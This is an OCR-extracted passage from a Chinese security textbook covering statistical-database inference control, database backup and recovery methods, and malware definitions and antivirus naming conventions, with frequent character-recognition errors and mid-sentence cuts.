级 应 该 是 所 有 数据 安全 最 小 上 界 的 查询 结果 。 

6. 统计 数据 库 推 理 

统计 数据 库 是 一 种 特殊 类 型 的 数据 库 ， 它 和 一 般 数 据 库 相 比 ， 其 特殊 之 处 在 于 ， 从 
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库 中 取得 的 信息 是 关于 实体 子 集 的 统计 信息 。 统 计数 据 库 与 普通 数据 库 一 样 ， 是 各 属性 
的 集合 ， 其 中 包含 许多 敏感 信息 。 就 统计 数据 库 本 身 而 言 ， 保 密 的 实质 就 是 只 能 让 用 户 
得 到 统计 信息 ， 而 不 能 得 到 数据 库 中 单个 记录 的 信息 。 表 面 上 看 ， 用 户 没有 对 单个 记录 
的 访问 权 , 仅 能 对 各 记录 的 汇总 统计 信息 进行 访问 , 各 记录 的 保密 性 因此 就 会 得 到 保障 ， 
但 事实 并 非 如 此 。 用 户 可 能 通过 合法 的 统计 信息 推导 出 敏感 数据 。 

解决 这 类 通道 的 主要 方法 是 采取 限制 和 干扰 的 方法 。 限 制 就 是 通过 抑制 非 敏感 数据 
控制 推理 。 干 扰 就 是 向 统计 数据 库 中 添加 随机 噪声 。 

目前 ， 推 理 通道 问题 的 解决 方案 仍 处 于 理论 探索 阶段 ， 没 有 一 种 通用 的 解决 方法 。 
这 主要 是 由 于 推理 通道 问题 本 身 的 多 样 性 与 不 确定 性 所 决定 的 。 目 前 常用 的 推理 控制 方 
法 可 以 分 为 两 类 : 第 一 类 是 在 数据 库 设 计时 找 出 推理 通道 ， 主 要 包括 利用 语义 数据 模型 
的 方法 和 形式 化 的 方法 。 这 类 方法 都 是 分 析 数 据 库 的 模式 ， 然 后 修改 数据 库 设计 或 者 提 
高 一 些 数据 项 的 安全 级 别 来 消除 推理 通道 .第 二 类 方法 是 在 数据 库 运 行 时 找 出 推理 通道 ， 
主要 包括 多 实例 方法 和 查询 修改 方法 。 


4.3.7 数据 库 的 备份 与 恢复 


对 于 一 个 安全 数据 库 系统 而 言 ， 需 要 保证 数据 库 系统 中 的 数据 不 受 各 种 自然 或 者 物 
理 问题 而 破坏 ， 如 地 震 、 水 灾 、 火 灾 、 盗 窍 、 电 力 问 题 或 设备 故障 等 。 为 了 实现 这 一 目 
标 ， 通 常 采取 的 方法 是 对 数据 库 进行 及 时 有 效 的 数据 备份 。 一 旦 系统 发 生 故 障 后 ， 利 用 
已 有 的 数据 备份 ， 把 数据 库 恢复 到 原来 的 状态 ， 并 保持 数据 的 完整 性 和 一 臻 性。 数据 库 
系统 所 采用 的 备份 与 恢复 技术 ， 对 系统 的 安全 性 与 可 靠 性 起 着 重要 作用 ， 也 对 系统 的 运 
行 效率 有 着 重大 影响 。 
43.7.1 ”数据 库 备份 

常用 的 数据 库 备份 分 为 物理 备份 和 人 逻辑 备份 ， 其 中 物理 备份 又 可 分 为 : 冷 备份 和 热 
备份 。 

1. 冷 备 份 

冷 备份 通常 是 通过 定期 的 对 系统 数据 库 进 行 备份 ， 并 将 备份 数据 存储 在 磁带 、 人 磁盘 
等 介质 上 。 备 份 的 数据 平时 处 于 一 种 非 激 活 的 状态 ， 直 到 故障 发 生 导 致 生产 数据 库 系统 
不 可 用 时 才 激 活 。 冷 备 数据 的 时 效 性 取决 于 最 近 一 次 的 数据 库 备 份 。 数 据 库 冷 备 的 周期 
一 般 较 长 。 一 般 而 言 ， 冷 备份 是 在 数据 库 关闭 情况 下 进行 的 备份 ， 故 称 为 脱 机 备份 。 这 
种 方法 在 保持 数据 完整 性 方面 显然 最 有 保障 。 

但 是 ， 在 实施 冷 备份 的 全 过 程 中 ， 数 据 库 必须 要 作 备份 而 不 能 作 其 他 工作 。 也 就 是 
说 ， 在 冷 备 份 过 程 中 ， 数 据 库 必须 是 关闭 状态 。 对 于 全 天 候 运 行 的 数据 库 服 务 器 来 说 ， 
较 长 时 间 地 关闭 数据 库 进行 备份 是 不 现实 的 。 冷 备份 一 般 是 单独 使 用 时 , 只 能 提供 到 “ 某 
一 时 间 点 上 ”的 恢复 。 若 磁盘 空间 有 限 ， 只 能 拷贝 到 磁带 等 其 他 外 部 存储 设备 上 ， 速 度 
会 很 慢 。 并 且 冷 备份 不 能 按照 数据 表 或 者 用 户 实施 恢复 。 
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2. RED 

热 备 份 是 指 当 数据 库 正 在 运行 时 进行 的 备份 ， 又 称 联 机 备份 。 热 备份 的 实现 通常 需 
要 一 个 备用 的 数据 库 系统 。 它 与 冷 备份 相似 ， 只 不 过 当 数 据 库 发 生 故 障 时 ， 可 以 通过 备 
用 数据 库 的 数据 进行 业务 恢复 。 因 此 ， 热 备份 的 恢复 时 间 比 冷 备份 大 大 缩短 。 由 于 备份 
是 存在 一 定 延 时 的 ， 在 延 时 期 间 的 数据 修改 无 法 立即 写 入 备份 过 程 ， 因 此 许多 热 备份 为 
了 在 不 断 更 新 的 过 程 中 保持 备份 数据 的 完整 性 ， 都 采取 了 数据 库 日 志 的 方法 。 在 备份 进 
行 时 ， 日 志文 件 将 需要 进行 数据 更 新 的 指令 以 堆栈 形式 写 入 文件 ， 并 不 进行 真正 的 物理 
更 新 。 当 数据 库 备份 结束 时 ， 系 统 再 按照 被 日 志文 件 存储 的 指令 对 数据 库 进 行 真正 的 物 
理 更 新 。 可 见 ， 被 备份 的 数据 保持 了 最 近 一 次 备份 开始 时 刻 前 的 数据 一 致 性 状态 。 

热 备份 能 够 在 表 空 间或 数据 库 文件 级 上 实现 备份 ， 备 份 的 时 间 短 。 在 备份 过 程 中 数 
据 库 仍 可 使 用 ,可 对 几乎 所 有 数据 库 实体 做 恢复 。 恢复 是 快速 的 , 在 大 多 数 情 况 下 可 在 
数据 库 仍 工作 时 恢复 。 但是, 热 备份 存在 一 些 不 足 。 如 果 系 统 在 进行 热 备份 时 一 旦 出 错 ， 
则 日 志文 件 中 记录 的 所 有 事务 都 会 被 丢失 ， 即 造成 数据 的 丢失 ， 后 果 非 常 严重 。 在 进行 
热 备份 的 过 程 中 ， 如 果 日 志文 件 占 用 系统 资源 过 大 ， 如 将 系统 存储 空间 占用 完 ， 会 造成 
系统 不 能 接受 业务 请 求 的 局 面 ， 对 系统 运行 产生 影响 。 并 且 ， 若 热 备 份 不 成 功 ， 所 得 结 
果 不 可 用 于 时 间 点 恢复 。 

3. 逻辑 备份 

逻辑 备份 是 物理 备份 的 一 种 补充 , 它 使 用 软件 技术 , 利用 导出 工具 执行 SQL 语句 方 
式 ， 从 数据 库 中 读 取 数 据 ， 将 其 导出 到 一 个 数据 文件 中 。 该 文件 的 格式 一 般 与 原 数据 库 
的 文件 格式 不 同 ， 而 是 原 数据 库 中 数据 内 容 的 一 个 映像 。 因 此 ， 逻 辑 备份 文件 只 能 用 来 
对 数据 库 进行 逻辑 恢复 ， 即 数据 导入 ， 而 不 能 按 数 据 库 原来 的 存储 特征 进行 物理 恢复 。 
逻辑 备份 一 般 用 于 增 量 备份 ， 即 备份 那些 在 上 次 备份 以 后 改变 了 的 数据 。 和 物理 备份 相 
比 ， 通 过 逻辑 备份 导出 的 数据 库 和 数据 文件 完全 脱离 了 关系 ， 并 且 可 以 被 导入 到 其 他 的 
数据 库 ， 甚 至 运行 于 其 他 操作 平台 的 数据 库 中 ， 因 此 具有 更 大 的 灵活 性 。 
43.7.2 ”数据 库 恢复 

数据 库 系统 中 的 恢复 主要 是 指 恢 复数 据 库 本 身 ， 即 在 故障 引起 数据 库 瘫痪 以 及 状态 
不 一 致 之 后 ， 将 数据 库 恢复 到 某 个 正确 状态 或 一 致 状态 。 数 据 库 恢复 的 基本 原理 是 利用 
“元 余 ” 进 行 数据 库 恢复 ， 其 核心 问题 是 恢复 策略 。 数据库 恢 复 技术 一 般 有 四 种 策略 : 基 
于 数据 转 储 的 恢复 、 基 于 日 志 的 恢复 、 基 于 检测 点 的 恢复 和 基于 镜像 数据 库 的 恢复 。 

1. 基于 数据 转 储 的 恢复 

基于 备份 的 恢复 是 指数 据 库 管 理 员 定期 地 将 整个 数据 库 复制 到 磁带 或 男 一 个 磁盘 
上 保存 起 来 的 过 程 ， 这 些 数 据 文本 称 为 后 备 副 本 或 后 援 副本 。 当 数据 库 失 效 时 ， 可 取 最 
近 一 次 的 数据 库 备 份 来 恢复 数据 库 ， 即 把 备份 的 数据 拷贝 到 原 数 据 库 所 在 的 位 置 上 。 通 
过 这 种 方法 ， 数 据 库 可 以 恢复 到 最 近 一 次 备份 的 状态 ， 实 现 起 来 也 很 简单 ， 不 增加 数据 
库 正 常 运行 时 的 开销 。 但 是 ， 这 种 恢复 会 造成 不 能 恢复 到 数据 库 的 最 近 的 一 致 状态 ， 即 
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从 最 近 备 份 到 故障 发 生 期 间 的 所 有 数据 库 更 新 将 会 丢失 。 

2. 基于 日 志 的 恢复 

基于 日 志 的 恢复 是 指 ， 运 行 时 将 对 数据 库 每 一 次 更 新 操作 ， 都 应 优先 记录 到 日 志文 
件 中 。 当 系统 出 现 故障 ， 导 致 事务 中 断 ， 反 向 扫描 文件 日 志 ， 查 找 该 事务 的 更 新 操作 ， 
然后 对 该 事务 的 更 新 操作 执行 道 操作 。 即 将 日 志 记录 中 “更 新 前 的 值 ” 写 入 数据 库 。 如 
此 反复 处 理 下 去 ， 直 至 读 到 此 事务 的 开始 标记 ， 事 务 故 障 恢复 就 完成 了 。 这 样 就 能 把 数 
据 库 恢复 到 上 一 次 备份 时 的 状态 ， 然 后 系统 自动 正 向 扫描 日 志文 件 ， 将 故障 发 生前 所 有 
提交 的 事务 放 到 重 做 队列 ， 将 未 提交 的 事务 放 到 撤销 队列 去 执行 。 这 样 就 可 把 数据 库 恢 
复 到 故障 前 某 一 时 刻 的 数据 一 致 性 状态 。 

3. 基于 检测 点 的 恢复 

利用 日 志 技术 进行 数据 库 恢 复 时 ， 恢 复 子 系统 必须 搜索 日 志 ， 从 而 确定 哪些 事务 需 
要 重 做， 哪些 事务 需要 撤销 。 但 是 这 样 做 存在 两 个 问题 : 即 搜索 整个 日 志 将 耗费 大 量 的 
时 间 , 同时 很 多 需要 重 做 处 理 的 事务 实际 上 已 经 将 它们 的 更 新 操作 结果 写 到 数据 库 中 了 
然而 恢复 子 系统 又 重新 执行 了 这 些 操 作 ， 浪 费 了 大 量 时 间 。 为 了 解决 这 些 问 题 ， 具 有 检 
查 点 的 恢复 技术 应 运 而 生 。 这 种 技术 在 日 志文 件 中 增加 一 类 新 的 记录 一 一 检查 点 记录 ， 
增加 一 个 重新 开始 文件 , 并 使 恢复 子 系统 在 登录 日 志文 件 期 间 动 态 地 维护 日 志 。 检查 点 
记录 的 内 容 包括 : 建立 检查 点 时 刻 所 有 正在 执行 的 事务 清单 和 这 些 事务 最 近 一 个 日 志 计 
录 的 地 址 。 重 新 开始 文件 用 来 记录 各 个 检查 点 记录 在 日 志文 件 中 的 地 址 。 

恢复 子 系统 可 以 定期 或 不 定期 地 建立 检查 点 保存 数据 库 状 态 。 检 查 点 可 以 按照 预定 
的 一 个 时 间 间 隔 建 立 , 如 每 隔 一 小 时 建立 一 个 检查 点 ; 也 可 以 按照 某 种 规则 建立 检查 点 ， 
如 日 志文 件 写 多 条 记录 建立 一 个 检查 点 ， 通 过 使 用 检查 点 方法 可 以 大 大 提高 改善 恢复 
效率 。 

4. 基于 镜像 数据 库 的 恢复 

介质 故障 是 对 系统 影响 最 为 严重 的 一 种 故障 。 系 统 出 现 介 质 故障 后 ， 用 户 应 用 全 部 
中 断 , 恢复 起 来 也 比较 费时 。 而 且 DBA 必须 周期 性 地 转 储 数据 库 , 加 重 了 DBA 的 负担 。 
如 果 不 及 时 而 正确 地 转 储 数据 库 ， 一 旦 发 生 介质 故障 ， 会 造成 较 大 的 损失 。 随 着 磁盘 容 
量 越 来 越 大 ， 价 格 越 来 越 便 宜 ， 为 避免 介质 故障 影响 数据 库 的 可 用 性 ， 许 多 数据 库 管 理 
系统 提供 了 数据 库 镜 像 功能 用 于 数据 库 恢复 。 

数据 库 镜 像 就 是 在 另 一 个 磁盘 上 作 数 据 库 的 实时 副本 。 当 主 数据 库 更 新 时 ，DBMS 
自动 把 更 新 后 的 数据 复制 到 镜像 数据 , 即 DBMS 始终 自动 保持 镜像 数据 和 主 数据 保持 一 
致 性 。 一 旦 当主 库 出 现 故 障 时 ,可 由 镜像 磁盘 继续 提供 使 用 ,同时 DBMS 自动 利用 镜像 
磁盘 数据 进行 数据 库 的 恢复 。 镜 像 策略 可 以 使 数据 库 的 可 靠 性 大 为 提高 。 但 由 于 数据 镜 
像 是 通过 复制 数据 实现 的 ， 频 繁 的 复制 会 降低 系统 运行 效率 ， 因 此 一 般 在 对 效率 要 求 满 
足 的 情况 下 可 以 使 用 。 为 兼顾 可 靠 性 和 可 用 性 ， 可 有 选择 性 地 对 关键 数据 作 镜 像 。 
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4.4 恶意 代码 


目前 Internet 正面 临 严峻 安全 挑战 ， 网 络 安全 事件 层出不穷 。 自 2000 年 以 来 ， 
RedCode, Nimda, Slammer, Blaster, Sasser, Zotob, Saodengbo, Conficker, Stuxnet 
等 重大 网 络 蠕虫 对 整个 互联 网 产生 了 严重 灾害 ， 与 此 同时 ， 网 络 病毒 数量 急剧 增加 ， 其 
通过 各 种 方式 疯狂 传播 自身 ， 木 马 程序 变种 不 断 ， 对 广大 网 络 用 户 个 人 隐私 造成 严重 威 
Wr, DDoS 攻击 愈演愈烈 ， 特 别 是 各 类 僵尸 网 络 的 出 现 ， 对 整个 网 络 和 互联 网 用 户 造成 
了 严重 的 安全 威胁 ， 而 各 种 间谍 和 广告 软件 更 是 无 孔 不 和 入。 病毒、 蠕虫、 木马、 后门 、 
Rootkit、 间 谍 软 件 和 广告 软件 等 等 ， 无 一 不 给 用 户 带 来 极 大 的 安全 隐患 。 而 随 着 移动 智 
能 终端 的 广泛 普及 ， 近 年 来 恶意 代码 在 移动 平台 得 到 了 迅猛 发 展 ， 其 正 给 用 户 带 来 巨大 
危害 。 

在 复杂 的 网 络 环境 中 ， 多 样 化 的 传播 途径 使 得 恶意 代码 安全 事件 的 发 生 频 率 急剧 增 
高 ， 履 盖 面 广 ， 造 成 的 损失 也 更 来 越 大 。 亚 意 代 码 已 经 成 为 当今 互联 网 最 为 严重 的 安全 
威胁 之 一 。 

恶意 代码 的 产生 是 计算 机 技术 和 以 计算 机 为 核心 的 社会 信息 化 进程 发 展 到 一 定 阶 
段 的 必然 产物 。 其 产生 的 典型 原因 有 : 

D 经 济 利益 驱使 (这 也 是 目前 制作 恶意 代码 的 最 主要 的 动机 ) ; 

@ 政治 和 军事 等 特殊 目的 ; 

@ 计算 机 爱好 者 出 于 好 奇 或 兴趣 ， 或 恶作剧 ; 


4.4.1 恶意 代码 定义 与 分 类 


恶意 代码 (Malicious Code， 有 时 也 称 作 Malware， 即 恶意 软件 )， 是 指 为 达到 恶意 
目的 而 专门 设计 的 程序 或 代码 , 是 指 一 切 旨 在 破坏 计算 机 或 者 网 络 系统 可 靠 性 、 可 用 性 、 
安全 性 和 数据 完整 性 或 者 消耗 系统 资源 的 恶意 程序 。 

恶意 代码 可 能 通过 软件 漏洞 、 电 子 邮 件 、 存 储 媒 介 或 者 其 他 方式 植 入 到 目标 计算 机 ， 
并 随 着 目标 计算 机 的 启动 而 自动 运行 。 目 前 发 现 的 恶意 代码 主要 的 存在 形态 有 : 恶意 数 
据 文 档 、 恶 意 网 页 、 内 存 代码 、 可 执行 程序 和 动态 链接 库 等 。 

恶意 代码 具有 如 下 共同 特征 : 

。 具有 恶意 的 目的 

。 自身 是 计算 程序 或 代码 

。 通过 执行 发 生 作 用 

反 病 毒 公司 和 安全 研究 人 员 按 照 已 经 存在 的 常规 术语 来 描述 恶意 代码 ， 这 些 术 语 包 
括 计算 机 病毒 、 KER. A. JIT, Rootkit. 流氓 软件 、 间谍 软件 、 广告 软件 、 HEE (bot), 
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Exploit 等 等 。 在 各 类 恶意 代码 的 具体 定义 上 ， 部 分 定义 已 经 约定 俗 成 ， 并 在 实践 中 得 到 
普遍 认同 ， 但 随 着 网 络 及 其 应 用 技术 的 快速 发 展 ， 恶 意 代码 传播 与 攻击 技术 也 在 不 断 推 
进 ， 部 分 恶意 代码 的 定义 也 在 逐渐 发 生变 化 ， 并 出 现 了 新 的 观点 ， 本 节 主 要 从 上 述 的 几 
个 类 别 对 恶意 代码 进行 介绍 。 


4.4.2 恶意 代码 的 命名 规则 


反 病 毒 公司 为 了 方便 管理 , 他 们 会 按照 恶意 代码 的 特性 , 将 恶意 代码 进行 分 类 命名 。 
虽然 每 个 反 病毒 公司 的 命名 规则 都 不 太一 样 ， 但 大 体 都 是 采用 一 个 统一 的 命名 方法 来 命 
名 的 。 

注意 : 目前 绝 大 多 数 反 病毒 公司 将 所 有 的 恶意 代码 都 纳入 在 广义 的 计算 机 病毒 范畴 
内 ， 即 恶意 代码 三 广义 的 计算 机 病毒 。 

恶意 代码 的 一 般 命 名 格式 为 : < 恶意 代码 前 缀 >.< 恶 意 代码 名 称 >.< 恶 意 代码 后 缀 > 

恶意 代码 前 级 是 指 一 个 恶意 代码 的 种 类 ， 比 如 常见 的 木马 程序 的 前 级 Trojan， 网 络 
蠕虫 的 前 绥 是 Worm， 后 门 的 前 级 为 BackDoor 等 等 ， 对 于 感染 型 病毒 程序 而 言 ， 前 级 有 
时 候 也 表示 了 该 病毒 发 作 的 操作 平台 ， 如 Macro，PE，Win32，Win95，VBS，…， 恶 意 
代码 的 前 级 有 时 候 也 可 能 包含 多 个 。 

在 早期 ， 如 果 没 有 前 级 ， 一 般 表 示 DOS 操作 系统 下 的 病毒 。 

恶意 代码 名 称 是 指 一 个 恶意 代码 的 家 族 特征 , 如 著名 的 CIH 病毒 的 家 族 名 都 是 统一 
的 “CIH”， 震 荡 波 蠕虫 的 家 族 名 是 “Sasser”， 冲 击 波 蠕虫 的 家 族 名 是 “MSBlaster”。 

恶意 代码 后 绥 的 数量 可 以 有 1 到 多 个 ， 如 果 只 有 1 个 ， 通 常 是 指 一 个 恶意 代码 的 变 
种 特征 , 是 用 来 区 别 具 体 某 个 家 族 恶 意 代码 的 某 个 变种 的 。 一 般 都 采用 英文 中 的 26 个 字 
母 来 表示 ， 如 Worm.Sasser.b 就 是 指 震荡 波 蠕虫 的 变种 B， 因 此 一 般 称 为 “震荡 波 B AE 
种 ”或 者 “震荡 波 变种 B”。 如 果 该 恶意 代码 变种 非常 多 (也 表明 该 病毒 生命 力 兢 强 )， 
可 以 采用 数字 与 字母 混合 表示 变种 标识 。 恶 意 代码 后 绥 也 可 以 用 来 表明 恶意 代码 的 其 他 
更 明确 的 特征 ， 如 @m 表示 其 可 以 通过 邮件 传播 ，@mm 表示 其 具有 邮件 群发 
(mass-mailer) 功能 。 

4421 常用 恶意 代码 前 缀 解释 

下 面 给 出 了 一 些 常见 的 恶意 代码 前 级 的 解释 (针对 用 得 最 多 的 Windows 操作 系统 ): 

1. 系统 病毒 

系统 病毒 的 前 级 为 Win32、PE、Win95、W32、W95 等 。 这 些 病毒 的 一 般 共 有 的 
特性 是 可 以 感染 Windows 操作 系统 的 *exe 和 *.dll 文件 ， 并 通过 这 些 文件 进行 传播 。 
如 CIH (Win32.cih)、FUNLOVE (Win32.Funlove). 

2. 网 络 蠕虫 

网 络 蠕虫 的 前 级 是 : Worm。 这 种 恶意 程序 的 共有 特性 是 通过 网 络 或 者 系统 漏洞 进 
行 传播 ,很 大 部 分 的 网 络 蠕虫 都 有 向 外 发 送 带 毒 邮件 、 阻 塞 网 络 的 特性 。 如 Wonm.Sasserf， 
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Worm .Blasterg。 

3. 特洛伊 木马 

木马 病毒 其 前 级 是 :Trojan。 木 马 病毒 的 共有 特性 是 通过 网 络 、 系 统 漏洞 或 者 诱惑 
用 户 自身 执行 等 方式 进入 用 户 的 系统 并 隐藏 ， 然 后 向 外 界 泄露 用 户 的 信息 。 如 
Trojan.QQ3344, Trojan.Huigezia 等 。 

4. 脚本 病毒 

脚本 病毒 的 前 级 是 :Script。 肢 本 病毒 的 共有 特性 是 使 用 脚本 语言 编写 , 通过 网 页 进 
行 的 传播 的 病毒 ， 如 红色 代码 (Script.Redlof)。 脚 本 病毒 还 会 有 如 下 前 级 : VBS, JS CK 
明 是 何 种 脚本 编写 的 )， 如 欢乐 时 光 (VBS.Happytime)、 十 四 日 (Js.Fortnight.c.s) 等 。 

5， 宏 病毒 

其 实 宏 病 毒 是 也 是 脚本 病毒 的 一 种 ， 由 于 它 的 特殊 性 ， 因 此 在 这 里 单独 算 成 一 类 。 
宏 病 毒 的 前 级 是 ，Macro， 其 可 能 还 有 第 二 前 绥 是 : Word、Word97、Excel、Excel97 等 
其 中 之 一 ， 以 进一步 表明 其 可 以 感染 的 office 版 本 。 该 类 病毒 的 共有 特性 是 能 感染 
OFFICE 系列 文档 ， 然 后 通过 OFFICE 通用 模板 进行 传播 ， 如 : 著名 的 美丽 莎 
(Macro.Melissa )。 

6. 后 门 程序 

后 门 程序 的 前 缀 是 : Backdoor。 该 类 程序 的 公有 特性 是 通过 网 络 传播 ， 给 系统 开 后 
门 ， 给 用 户 电脑 带 来 安全 隐患 。 如 Backdoor.Agobot.frt, BackdoorHackDefays。 

7. 病毒 种 植 程序 病毒 

这 类 病毒 的 公有 特性 是 运行 时 会 从 体内 释放 出 一 个 或 几 个 新 的 病毒 到 系统 目录 下 ， 
由 释放 出 来 的 新 病毒 产生 破坏 。 如 : 冰河 播种 者 (Dropper.BingHe2.2C)、MSN 射手 
(Dropper.Worm.Smibag) 等。 

8. 破坏 性 程序 病毒 

破坏 性 程序 病毒 的 前 绥 是 : Harm。 这 类 病毒 的 公有 特性 是 本 身 具有 好 看 的 图 标 来 诱 
惑 用 户 点 击 ， 当 用 户 点 击 这 类 病毒 时 ， 病 毒 便 会 直接 对 用 户 计算 机 产生 破坏 。 如 : 格式 
化 C 盘 (Harm.formatC.f), AFA (Harm.Command. Killer) 等 。 

9， 玩笑 病毒 

玩笑 病毒 的 前 缀 是 : Joke。 也 称 恶 作 剧 病毒 。 这 类 病毒 的 公有 特性 是 本 身 具 有 好 看 
的 图 标 来 诱惑 用 户 点 击 ， 当 用 户 点 击 这 类 病毒 时 , 病毒 会 做 出 各 种 破坏 操作 来 吓 距 用 户 ， 
其 实 病毒 并 没有 对 用 户 电脑 进行 任何 破坏 。 如 : YA (Joke.Girlghost) 病毒 。 

10. 捆绑 机 病毒 

捆绑 机 病毒 的 前 级 是 ，Binder。 这 类 病毒 的 公有 特性 是 病毒 作者 会 使 用 特定 的 捆绑 
程序 将 病毒 与 一 些 应 用 程序 如 QQ、 下 捆绑 起 来 ， 表 面 上 看 是 一 个 正常 的 文件 ， 当 用 户 
运行 这 些 捆 绑 病 毒 时 ， 会 表面 上 运行 这 些 应 用 程序 ， 然 后 隐藏 运行 捆绑 在 一 起 的 病毒 ， 
从 而 给 用 户 造成 危害 。 如: 捆绑 QQ (Binder QQPass.QQBin)、 系 统 杀手 (Binderkillsys) 等 。 
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以 上 为 比较 常见 的 病毒 前 级 ， 有 时 候 还 会 看 到 一 些 其 他 的 病毒 后 级 ， 辟 如: 

DoS: 会 针对 某 台 主机 或 者 服务 器 进行 DoS 攻击 ; 

Exploit; 会 自动 通过 溢出 对 方 或 者 自己 的 系统 漏洞 来 传播 自身 ， 或 者 他 本 身 就 是 一 
个 用 于 Hacking 的 溢出 工具 ; 

HackTool: 黑客 工具 ， 可 以 用 于 去 对 其 他 电脑 进行 黑客 攻击 。 
4.4.2.2 CARO 的 命名 规则 

1991 年 , CARO (计算 机 反 病 毒 研究 组 织 , Computer Anti-virus Researchers Organization ) 
的 创始 人 员 就 制定 了 一 套 应 用 于 反 病 毒 CAV) 产品 的 计算 机 病毒 的 命名 规则 。 如 今 ， 
对 于 现在 的 应 用 来 说 ，CARO 的 命名 规则 已 经 显得 稍微 有 点 过 时 了 ， 但 是 它 仍 然 是 大 多 
数 反 病毒 公司 曾 采 用 过 的 通用 标准 。 注 释 最 初 的 命名 规则 是 由 Alan Solomon W} Fridrik 
Skulason 和 Vesselin Bontchev 博士 制定 的 。 

以 下 是 恶意 代码 命名 的 最 复杂 的 形式 : 


<malware type>: //<platform>/<family name>.<group name>.<infective_ 
length>.<sub variant><devolution><modifiers> 


实际 上 ， 也 只 有 非常 少数 的 恶意 代码 需要 以 上 所 有 的 名 称 组 成 部 分 。 事 实 上 ， 除 了 
family name 以 外 ， 所 有 的 其 他 部 分 都 是 可 选 的 。 

以 上 每 个 组 成 部 分 介绍 如 下 : 

1. 恶意 代码 类 型 (malware_type) 

恶意 代码 类 型 确定 该 恶意 软件 是 病毒 、 特 洛 伊 森马、 蠕虫 、Rootkit、 投 放 器 、 潜 伏 
病毒 (intended)、 工 具 包 (kit)， 或 者 垃圾 (garbage) 等 。 

2. 平台 (platform) 

LA (platform) 前 级 表明 了 此 恶意 代码 运行 的 目标 系统 平台 或 环境 ， 如 Win32, 
Linux 操作 系统 ， 或 MS Office 环境 等 。 

3. RRB (family_name) 

家 族 名 是 恶意 代码 名 称 的 关键 组 成 部 分 ， 其 是 恶意 软件 名 称 的 关键 标识 。 

4. 组 名 (group_name) 

组 名 (group name) 代表 一 个 大 的 计算 机 病毒 家 族 (family) 的 细 分 ， 这些 病毒 之 间 
非常 相似 。 组 名 (group name) 主要 是 用 来 对 病毒 家 族 进行 分 组 。 

5. 感染 程度 〈infective length) 

感染 长 度 (infective length) 是 用 来 区 分 同一 族 (family) 或 者 组 (group) 中 的 不 同 
寄生 病毒 的 ， 用 病毒 的 典型 感染 长 度 的 字 节 数 来 表示 。 

6. BZ (variant) 

变种 表示 同一 病毒 家 族 中 的 具有 相同 感染 长 度 的 、 仅 有 较 小 改变 的 病毒 。 
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7. 退化 标识 〈devolution) 

退化 (devolution) 标识 符 通常 在 宏 病毒 中 同 变种 名 一 起 使 用 。 一 些 宏 病毒 通常 有 这 
样 的 功能 (大 部 分 与 编写 程序 时 的 错误 有 关 ), 就 是 能 在 它们 的 正常 复制 周期 中 为 它们 最 
初 的 宏 集合 创建 一 个 子 集 。 这 样 ， 虽 然 宏 的 子 集 无 法 重新 生成 最 初 的、 完整 的 宏 集 合 ， 
但 是 仍然 可 以 从 这 一 部 分 集合 中 递归 地 进行 复制 。 

8. 修饰 符 (modifiers) 

修饰 符 (modifier) 的 最 初 目的 是 为 了 标识 计算 机 病毒 的 多 态 引 擎 (polymorphic 
engine)。 不 过 ， 实 际 上 大 部 分 反 病毒 软件 开发 人 员 从 不 使 用 此 修饰 符 。 如 今 ， 修 饰 符 包 
括 以 下 可 选 的 组 成 部 分 : 

locale_specifier 

这 一 说 明 符 主要 在 宏 病毒 中 使 用 ， 这 些 宏 病 毒 依赖 于 某 种 特殊 语言 版 本 的 运行 环 
Sa, 例如 Word。 举 个 例子 ,virus: //WM/Concept.B:Fr 是 一 个 仅仅 对 法 语 版 本 的 Microsoft 
Word 起 作用 的 病毒 。 

packer 

加 过 器 (packer) 这 一 修饰 符 在 实际 应 用 中 是 很 少 使 用 的 。 它 表明 计算 机 恶意 代码 
是 通过 使 用 类 似 UPX 这 样 的 “实时 ”(on-the-fly) 压缩 工具 进行 加 壳 处 理 过 的 。 

@m 或 @mm 

这 些 符号 表明 是 邮件 (selfmailer) 或 者 邮件 群发 (mass-mailer 病毒. 这 是 由 Bontchev 
提出 的 ， 或 许 已 经 成 为 最 为 广泛 接受 的 修饰 符 。 这 一 修饰 符 强 调 了 这 是 一 种 很 有 可 能 
胁 到 普通 用 户 的 计算 机 病毒 ， 因 为 这 种 病毒 是 通过 使 用 电子 邮件 进行 自动 传播 的 。 

vendor-specific_comment 

vendor-specific 修饰 符 是 后 来 增加 的 , 允许 开发 商 为 恶意 代码 名 称 添加 这 种 修饰 符 的 
后 级 。 例 如 ， 开 发 商 有 可 能 希望 在 名 称 中 使 用 !mp 来 表明 这 是 一 种 复合 (multipartite) 
病毒 。 
4.4.3 ”计算 机 病毒 


4.4.3.1 计算 机 病毒 的 定义 

广义 上 的 计算 机 病毒 泛 指 所 有 恶意 代码 ， 此 处 的 计算 机 病毒 是 狭义 上 的 ， 其 是 指 恶 
意 代 码 下 的 一 个 重要 分 支 ， 是 最 常见 的 恶意 代码 类 型 之 一 。 

1984 年 ， 计 算 机 病毒 的 定义 由 美国 计算 机 病毒 研究 专家 Fred Cohen 博士 在 
“Computer Viruses: Theory and Experiments” 一 文中 提出 : 计算 机 病毒 是 一 种 寄生 在 其 
他 程序 之 上 ， 能 够 自我 繁殖 ， 并 对 寄生 体 产 生 破 坏 的 一 段 可 执行 代码 或 程序 。 计 算 机 病 
毒 的 独特 感染 传播 能 力 使 得 它 可 以 很 快 地 蔓延 ， 并 且 常 常 难以 根除 。 它 们 能 将 自身 附 在 
各 种 类 型 的 文件 上 ， 当 文件 被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ， 它 们 就 随同 文件 
一 同 被 传播 。 
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1994 年 2 月 18 日 ， 我 国正 式 颁 布 实施 了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保 
护 条 例 》， 在 《条 例 》 第 二 十 八条 中 明确 指出 :“ 计 算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程 
序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 响 计算 机 使 用 ， 并 能 自我 复制 的 一 组 计算 
机 指令 或 者 程序 代码 ”。 

计算 机 病毒 技术 从 其 产生 发 展 至 今 渐渐 发 生 了 非常 大 的 变化 ， 如 今 的 计算 机 病毒 结 
合 各 类 技术 向 多 方面 发 展 ， 其 边界 也 越 来 越 泛 化 。 

目前 关于 计算 机 病毒 定义 的 另外 一 种 重要 观点 是 ， 计 算 机 病毒 早已 突破 主机 内 程序 
代码 感染 的 局 限 ， 而 将 感染 传播 目标 延伸 到 其 他 主机 ， 其 已 经 从 程序 寄生 为 主 发 展 为 主 
